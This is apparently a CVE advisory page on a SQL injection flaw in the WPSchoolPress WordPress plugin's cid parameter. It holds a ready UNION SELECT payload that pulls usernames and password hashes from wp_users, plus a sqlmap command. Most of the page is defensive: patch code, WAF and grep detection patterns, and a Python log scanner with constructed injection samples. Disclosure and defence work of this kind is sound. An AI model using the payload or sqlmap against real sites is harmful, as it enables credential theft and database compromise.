The WPSchoolPress plugin (≤ 2.2.16) for WordPress is vulnerable to SQL Injection via the `cid` parameter due to improper input sanitization and lack of prepared statements. Authenticated attackers with “Custom-level” access can manipulate SQL queries by injecting malicious payloads into the `cid` parameter. This allows execution of arbitrary SQL commands, potentially leading to unauthorized data access, modification, or database takeover. The vulnerability stems from direct concatenation of user input into SQL queries without proper escaping.
DailyCVE Form:
Platform: WordPress
Version: ≤ 2.2.16
Vulnerability: SQL Injection
Severity: Critical
Date: 03/28/2025
What Undercode Say:
Exploit:
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.com Action: wpsp_get_class_students cid=1' UNION SELECT user_login,user_pass FROM wp_users-- -
Detection:
sqlmap -u "https://target.com/wp-admin/admin-ajax.php" --data="action=wpsp_get_class_students&cid=1" --risk=3 --level=5
Mitigation:
1. Update to WPSchoolPress ≥ 2.2.17.
2. Apply WAF rules blocking SQLi patterns. Note that `location ~ .php$ { deny all; }` is not such a rule: it denies every PHP request and takes the whole WordPress site offline. A rule scoped to the vulnerable argument can be added inside the existing `location ~ \.php$` block (this inspects the query string only; POST bodies need a body-inspecting WAF such as ModSecurity):
if ($arg_cid ~* "(union|select|sleep|benchmark)") { return 403; }
3. Patch code snippet (PHP):
$cid = isset($_POST['cid']) ? absint($_POST['cid']) : 0; // force a non-negative integer before it reaches SQL
$results = $wpdb->get_results(
    $wpdb->prepare("SELECT * FROM {$wpdb->prefix}wpsp_students WHERE cid = %d", $cid) // placeholder, no string concatenation
);
Log Analysis:
grep -Ei '"(GET|POST) [^"]*admin-ajax\.php[^"]*cid=[^" ]*(union|select|sleep|benchmark|%27)' /var/log/nginx/access.log
Note: the default nginx access log records only the request line, so a `cid` value sent in a POST body is not visible there; this catches query-string variants only. Log `$request_body` or use the WAF's own log to see body parameters.
Indicators of Compromise (IoC):
- Unusual `admin-ajax.php` requests with `cid` parameter containing SQL keywords.
- Unexpected database exports or user table accesses.
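As an added example (not from the advisory or the plugin), a small Python checker that applies the indicators above to nginx combined-format access-log lines: it parses the request line, URL-decodes the `cid` value (twice, so double encoding does not slip past), flags anything that is not a plain integer and lists the SQL keywords present. The sample lines are constructed; as with the grep above, only query-string values are visible because POST bodies are not in the default access log.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlparse

# Combined log format: client - - [time] "METHOD target HTTP/x" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# SQL keywords that never belong in a numeric class id (checked after URL-decoding)
SQL_KEYWORDS = ("union", "select", "sleep", "benchmark")


def classify(line):
    """Parse one access-log line; return a dict for admin-ajax.php requests carrying cid, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m.group("target"))
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    if "cid" not in params:
        return None  # no cid in the query string; POST bodies are not in the default access log
    # parse_qs decoded once; decode again so %2527-style double encoding is normalised too
    cid = unquote_plus(params["cid"][0])
    keywords = [k for k in SQL_KEYWORDS if re.search(rf"\b{k}\b", cid, re.IGNORECASE)]
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "cid": cid,
        "keywords": keywords,
        # a legitimate class id is a plain integer; anything else warrants a look
        "suspicious": not cid.isdigit(),
    }


def scan(lines):
    """Return the classified entries whose cid is not a plain integer."""
    return [r for r in map(classify, lines) if r and r["suspicious"]]


# Constructed sample lines (not real traffic): benign, two injection attempts, a POST, an unrelated path
SAMPLE_LOG = [
    '10.0.0.5 - - [28/Mar/2025:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=wpsp_get_class_students&cid=12 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [28/Mar/2025:10:00:09 +0000] "GET /wp-admin/admin-ajax.php?action=wpsp_get_class_students&cid=1%27%20UNION%20SELECT%201,2-- HTTP/1.1" 200 2048 "-" "curl/8.0"',
    '203.0.113.7 - - [28/Mar/2025:10:00:11 +0000] "GET /wp-admin/admin-ajax.php?action=wpsp_get_class_students&cid=1%2527%2520union%2520select%25201,2 HTTP/1.1" 200 2048 "-" "curl/8.0"',
    '198.51.100.2 - - [28/Mar/2025:10:01:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 128 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [28/Mar/2025:10:01:05 +0000] "GET /index.php?cid=1%27 HTTP/1.1" 200 3000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["time"], hit["ip"], repr(hit["cid"]), hit["keywords"])
```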
Workaround:
add_filter('query', function ($sql) {
    // Only block when the submitted cid is not a plain integer. A broad regex such as
    // /\b(UNION|SELECT\s.+\sFROM)\b/i would also reject WordPress's own queries and take the site down.
    if (isset($_POST['cid']) && ! ctype_digit((string) $_POST['cid']) && stripos($sql, 'wpsp_students') !== false) {
        wp_die('SQL Injection attempt blocked.', '', 403);
    }
    return $sql;
});
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-1670